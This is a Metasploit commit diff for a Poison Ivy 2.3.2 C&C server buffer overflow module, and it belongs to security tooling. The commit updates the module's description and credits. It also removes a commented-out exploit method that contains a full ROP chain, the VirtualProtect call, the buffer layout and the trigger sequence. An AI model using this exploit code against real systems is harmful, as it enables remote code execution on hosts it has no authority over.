poisonivy_bof description updated

rapid7 · Jul 4, 2012 · ff4a0bc · ff4a0bc
1 parent 8bdf3b5
commit ff4a0bc
Showing 1 changed file with 12 additions and 77 deletions.
diff --git a/modules/exploits/windows/misc/poisonivy_bof.rb b/modules/exploits/windows/misc/poisonivy_bof.rb
@@ -18,22 +18,25 @@ def initialize(info = {})
 			'Name'           => "Poison Ivy 2.3.2 C&C Server Buffer Overflow",
 			'Description'    => %q{
 				This module exploits a stack buffer overflow in Poison Ivy 2.3.2 C&C server.
-				The exploit does not need to know the password chosen for the bot/server comm.
-				If the C&C is configured with the default 'admin' password the exploit should
-				work fine. In case of the C&C configured with another password the exploit can
-				fail.
+				The exploit does not need to know the password chosen for the bot/server
+				communication. If the C&C is configured with the default 'admin' password,
+				the exploit should work fine. In case of the C&C configured with another
+				password the exploit can fail. The 'check' command can be used to determine
+				if the C&C target is using the default 'admin' password.
 
 				Hopefully an exploit try won't crash the Poison Ivy C&C process, just the thread
-				responsible of handling the connection. Because of this the module provides a
-				Bruteforce target. When selected a random header will be sent in case the default
-				for the password 'admin' doesn't work. Bruteforce will stop after 5 tries or a
-				session obtained.
+				responsible of handling the connection. Because of this the module provides the
+				RANDHEADER option and a	bruteforce target. If RANDHEADER is used a random header
+				will be used. If the bruteforce target is selected, a random header will be sent in
+				case the default for the password 'admin' doesn't work. Bruteforce will stop after
+				5 tries or a session obtained.
 			},
 			'License'        => MSF_LICENSE,
 			'Author'         =>
 				[
 					'Andrzej Dereszowski', # Vulnerability Discovery
-					'Gal Badishi' # Exploit and Metasploit module
+					'Gal Badishi', # Exploit and Metasploit module
+					'juan vazquez' # Testing and little of Metasploit-fu
 				],
 			'References'     =>
 				[
@@ -176,72 +179,4 @@ def do_exploit(header)
 (1) Poison Ivy fails to run on DEP enabled systems (maybe due to the unpacking process)
 (2) When trying a unpacked version on DEP enabled systems windows/exec payload runs, but not meterpreter
 
-	def exploit
-
-		# This is the 32-byte header we want to send, encrypted with the default password ("admin")
-		# We have a very good chance of succeeding even if the password was changed
-		header = "\xe7\x77\x44\x30\x9a\xe8\x4b\x79\xa6\x3f\x11\xcd\x58\xab\x0c\xdf\x2a\xcc\xea\x77\x6f\x8c\x27\x50\xda\x30\x76\x00\x5d\x15\xde\xb7"
-
-		short_rop = [
-			0x0041F1E9,	# 1st jump - will put esp (8 bytes from here) into ecx: push esp # and al,4 # pop ecx # pop edx # retn
-			0x00401000,	# Readable/writeable - will be cleaned by original ret 4 (esp will point to the next dword)
-			0xFFFF8000,	# edx. We'll add this number later to ebp (which will subtract 0x8000 from it).
-			0x0042F63A,	# Will put esp into ebp: push esp # pop ebp # pop edi # pop esi # pop ebx # retn
-			0x00000000,	# edi (ebp points here now)
-			0x00000000,	# esi
-			0x00000000,	# ebx
-			0x00426799,	# We need this to offset ebp: mov eax,edx # retn
-			0x0041F337,	# Subtract 0x8000 from ebp: add ebp,eax # retn
-			0x00403A77,	# mov esp,ebp # pop ebp # retn
-		].pack("V*")
-
-		long_rop = [
-			0x00000000,	# New ebp
-			0x0041F1E9,	# Will put esp (8 bytes from here) into ecx: push esp # and al,4 # pop ecx # pop edx # retn
-			0x0000002C,	# edx. We'll add this number later to ebp, to prevent looping.
-			0x0042F63A,	# Will put esp into ebp: push esp # pop ebp # pop edi # pop esi # pop ebx # retn
-			0x00000001,	# edi. We need it when we call VirtualProtect (ebp points here now)
-			0x00000000,	# esi
-			0x00000000,	# ebx
-			0x00426799,	# We need this to offset ebp: mov eax,edx # retn
-			0x0041F337,	# Subtract 0x8000 from ebp: add ebp,eax # retn
-			0x004D82DE,	# eax will now point 8 bytes from the beginning of the bigger ROP chain: mov eax,ecx # retn
-			0x004F196E,	# push eax (address) and call VirtualProtect, then add ebx, 0x28 # mov edi, 0x46FAC1 # pop esi # pop ebx # mov esp, ebp # pop ebp # ret 8
-			0x00004000,	# Size
-			0x00000040,	# New protect (0x40 = PAGE_EXECUTE_READWRITE)
-			0x00401000,	# Old protect (ptr)
-			0x00000000,	# esi
-			0x00000000,	# ebx. ebp will point here after the offset, meaning that esp will point here after VirtualProtect.
-			0x0041AA97,	# jmp esp (also new ebp)
-			0x00000000,	# Discarded
-			0x00000000,	# Discarded
-		].pack("V*")
-
-		short_rop_pos = 0x806D
-		long_rop_pos = short_rop_pos - 0x7FF0
-
-		# Handshake
-		connect
-		print_status("Performing handshake...")
-		sock.put("\x00" * 256)
-		sock.get
-
-		# Don't change the nulls, or it might not work
-		xploit  = ''
-		xploit << header
-		xploit << "\x00" * (long_rop_pos - xploit.length)
-		xploit << long_rop
-		xploit << payload.encoded
-		xploit << "\x00" * (short_rop_pos - xploit.length)
-		xploit << short_rop
-
-		# The disconnection triggers the exploit
-		print_status("Sending exploit...")
-		sock.put(xploit)
-		select(nil,nil,nil,5)
-		disconnect
-
-		# Time to own the box
-		handler
-	end
 =end